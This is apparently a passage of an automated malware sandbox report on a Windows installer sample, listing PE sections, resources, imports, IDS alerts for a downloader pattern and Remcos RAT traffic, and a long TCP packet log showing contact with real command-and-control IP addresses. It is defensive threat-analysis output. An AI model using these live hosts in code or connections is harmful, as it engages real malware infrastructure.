                                                                                                            .data0x90000x1a7d80x400fb9d2533be3ef4d00846e8af39bd7737False0.60546875data4.9399066801473905IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                            .ndata0x240000x250000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                            .rsrc0x490000x33e80x3400a30a3ba6a156bc3079cd512b77dd1c4eFalse0.4284855769230769data5.116822082391606IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                            Resources

                                                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                            RT_ICON0x492f80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishUnited States0.5030487804878049
                                                                                                            RT_ICON0x4a3a00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishUnited States0.39305054151624547
                                                                                                            RT_ICON0x4ac480x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishUnited States0.4342485549132948
                                                                                                            RT_ICON0x4b1b00x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishUnited States0.42730496453900707
                                                                                                            RT_ICON0x4b6180x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishUnited States0.3803763440860215
                                                                                                            RT_ICON0x4b9000x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishUnited States0.5743243243243243
                                                                                                            RT_DIALOG0x4ba280x100dataEnglishUnited States0.5234375
                                                                                                            RT_DIALOG0x4bb280x11cdataEnglishUnited States0.6056338028169014
                                                                                                            RT_DIALOG0x4bc480xc4dataEnglishUnited States0.5918367346938775
                                                                                                            RT_DIALOG0x4bd100x60dataEnglishUnited States0.7291666666666666
                                                                                                            RT_GROUP_ICON0x4bd700x5adataEnglishUnited States0.7
                                                                                                            RT_VERSION0x4bdd00x30cdataEnglishUnited States0.4948717948717949
                                                                                                            RT_MANIFEST0x4c0e00x305XML 1.0 document, ASCII text, with very long lines (773), with no line terminatorsEnglishUnited States0.5614489003880984

                                                                                                            Imports

                                                                                                            DLLImport
                                                                                                            KERNEL32.dllGetTickCount, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, SearchPathA, GetShortPathNameA, CreateFileA, GetFileSize, GetModuleFileNameA, ReadFile, GetCurrentProcess, CopyFileA, ExitProcess, SetEnvironmentVariableA, Sleep, CloseHandle, GetCommandLineA, SetErrorMode, LoadLibraryA, lstrlenA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, GetTempFileNameA, lstrcpyA, lstrcatA, GetSystemDirectoryA, GetVersion, GetProcAddress, GlobalAlloc, CompareFileTime, SetFileTime, ExpandEnvironmentStringsA, lstrcmpiA, lstrcmpA, WaitForSingleObject, GlobalFree, GetExitCodeProcess, GetModuleHandleA, GetTempPathA, GetWindowsDirectoryA, LoadLibraryExA, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, WriteFile, FindClose, WritePrivateProfileStringA, MultiByteToWideChar, MulDiv, GetPrivateProfileStringA, FreeLibrary
                                                                                                            USER32.dllCreateWindowExA, EndDialog, ScreenToClient, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, GetDC, SystemParametersInfoA, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, ReleaseDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, DestroyWindow, CreateDialogParamA, SetTimer, GetDlgItem, wsprintfA, SetForegroundWindow, ShowWindow, IsWindow, LoadImageA, SetWindowLongA, SetClipboardData, EmptyClipboard, OpenClipboard, EndPaint, PostQuitMessage, FindWindowExA, SendMessageTimeoutA, SetWindowTextA
                                                                                                            GDI32.dllSelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                                                                                            SHELL32.dllSHGetSpecialFolderLocation, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA
                                                                                                            ADVAPI32.dllRegCloseKey, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegEnumValueA, RegCreateKeyExA, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
                                                                                                            COMCTL32.dllImageList_Create, ImageList_AddMasked, ImageList_Destroy
                                                                                                            ole32.dllCoCreateInstance, CoTaskMemFree, OleInitialize, OleUninitialize
                                                                                                            VERSION.dllGetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA

                                                                                                            Possible Origin

                                                                                                            Language of compilation systemCountry where language is spokenMap
                                                                                                            EnglishUnited States

                                                                                                            Network Behavior

                                                                                                            Suricata IDS Alerts

                                                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                            2024-11-21T12:20:15.335061+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.74982645.133.158.3680TCP
                                                                                                            2024-11-21T12:20:18.397173+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.74983345.133.158.3611371TCP
                                                                                                            2024-11-21T12:20:20.709769+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.74984045.133.158.3611371TCP
                                                                                                            2024-11-21T12:20:20.949672+01002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.749842178.237.33.5080TCP

                                                                                                            Network Port Distribution

                                                                                                            TCP Packets

                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                            Nov 21, 2024 12:20:14.064815044 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:14.184772968 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:14.185420036 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:14.208904982 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:14.328377008 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:15.334956884 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:15.335019112 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:15.335031986 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:15.335061073 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:15.335061073 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:15.335081100 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:15.335095882 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:15.335108995 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:15.335134029 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:15.335141897 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:15.335141897 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:15.335141897 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:15.335150003 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:15.335158110 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:15.335166931 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:15.335230112 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:15.335230112 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:15.455786943 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:15.455806971 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:15.455857992 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:15.455919981 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:15.459799051 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:15.459858894 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:15.526866913 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:15.526913881 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:15.527034044 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:15.527034044 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:15.531332970 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:15.531354904 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:15.531392097 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:15.531409025 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:15.539706945 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:15.539767981 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:15.539819002 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:15.539844036 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:15.548064947 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:15.548096895 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:15.548147917 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:15.548149109 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:15.556530952 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:15.556601048 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:15.556633949 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:15.556657076 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:15.564994097 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:15.565054893 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:15.565094948 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:15.565094948 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:15.573471069 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:15.573535919 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:15.573544979 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:15.573807955 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:15.581908941 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:15.582016945 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:15.582062006 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:15.582062006 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:15.718933105 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:15.719055891 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:15.737297058 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:15.737338066 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:15.737684011 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:15.737684011 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:15.741262913 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:15.741326094 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:15.741345882 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:15.741394043 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:15.749768019 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:15.749799013 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:15.750114918 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:15.758341074 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:15.758424997 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:15.758493900 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:15.758493900 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:15.766663074 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:15.766725063 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:15.766761065 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:15.766895056 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:15.775151968 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:15.775192022 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:15.775274992 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:15.775296926 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:15.783514023 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:15.783621073 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:15.783627987 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:15.783689976 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:15.791944981 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:15.792015076 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:15.792053938 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:15.792092085 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:15.800456047 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:15.800472021 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:15.800626040 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:15.808948040 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:15.809035063 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:15.809077978 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:15.809155941 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:15.817406893 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:15.817486048 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:15.817504883 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:15.817554951 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:15.825766087 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:15.825826883 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:15.825856924 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:15.825913906 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:15.834270954 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:15.834306002 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:15.834384918 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:15.834384918 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:15.842732906 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:15.842768908 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:15.842813969 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:15.842813969 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:15.851144075 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:15.851180077 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:15.851197004 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:15.851263046 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:15.859577894 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:15.859656096 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:15.859690905 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:15.859751940 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:15.868072987 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:15.868130922 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:15.868185997 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:15.868231058 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:15.876543999 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:15.876569986 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:15.876615047 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:15.876616001 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:15.885061979 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:15.885083914 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:15.885234118 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:15.885234118 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:15.893506050 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:15.893595934 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:15.893651009 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:15.893702984 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:15.901912928 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:15.901931047 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:15.901983023 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:15.902031898 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:15.910270929 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:15.910331964 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:15.910388947 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:15.910388947 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:15.918807983 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:15.918828964 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:15.918920040 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:15.918920040 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:15.927222013 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:15.927299023 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:15.927333117 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:15.927390099 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:15.935616970 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:15.935698032 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:15.935718060 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:15.935787916 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:15.944067001 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:15.944183111 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:15.944185972 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:15.944247007 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:15.952138901 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:15.952228069 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:15.952234983 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:15.952316999 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:15.959712982 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:15.959856033 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:15.959867954 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:15.959899902 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:15.966846943 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:15.966932058 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:15.966975927 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:15.966975927 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:15.973819971 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:15.973872900 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:15.973901033 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:15.973922968 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:15.980300903 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:15.980336905 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:15.980401039 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:15.980401039 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:15.986542940 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:15.986618042 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:15.986635923 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:15.986673117 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:15.992640972 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:15.992679119 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:15.992741108 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:15.992741108 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:15.995665073 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:15.995764971 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:15.995843887 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:15.998727083 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:15.998857021 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:15.998886108 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:15.998980999 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:16.001805067 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:16.001857996 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:16.001909971 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:16.001993895 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:16.004959106 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:16.005050898 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:16.005062103 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:16.005129099 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:16.007777929 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:16.007846117 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:16.007890940 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:16.008012056 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:16.010622978 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:16.010711908 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:16.010745049 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:16.010831118 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:16.013569117 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:16.013639927 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:16.013716936 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:16.013900042 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:16.016383886 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:16.016489029 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:16.016493082 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:16.016539097 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:16.019290924 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:16.019354105 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:16.019356012 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:16.019407034 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:16.022104979 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:16.022218943 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:16.022228003 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:16.022267103 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:16.024988890 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:16.025124073 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:16.025191069 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:16.025239944 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:16.027832985 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:16.027903080 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:16.027947903 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:16.028002024 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:16.030824900 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:16.030889034 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:16.030915022 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:16.030951023 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:16.033632994 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:16.033736944 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:16.033780098 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:16.033781052 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:16.036509991 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:16.036581993 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:16.036611080 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:16.036655903 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:16.039344072 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:16.039370060 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:16.039478064 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:16.039478064 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:16.042362928 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:16.042426109 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:16.042637110 CET4982680192.168.2.745.133.158.36
